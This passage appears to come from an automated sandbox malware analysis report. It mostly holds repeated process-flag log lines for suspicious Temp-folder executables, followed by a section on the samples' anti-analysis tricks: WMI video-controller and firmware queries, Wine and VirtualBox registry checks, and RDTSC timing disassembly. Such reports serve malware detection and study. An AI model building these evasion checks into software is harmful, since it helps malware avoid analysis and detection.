Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1069985001\MvowLGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1070035101\b3d465ea47.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068808001\af53YGc.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1070029001\af53YGc.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1070032001\L65uNi1.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB6D1 second address: 8BB6F7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F19A4DEDF3Dh 0x00000008 jmp 00007F19A4DEDF37h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB835 second address: 8BB839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB839 second address: 8BB83D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB83D second address: 8BB84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB84C second address: 8BB859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F19A4DEDF3Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB859 second address: 8BB880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19A4F6503Fh 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c jmp 00007F19A4F6503Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BB880 second address: 8BB886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
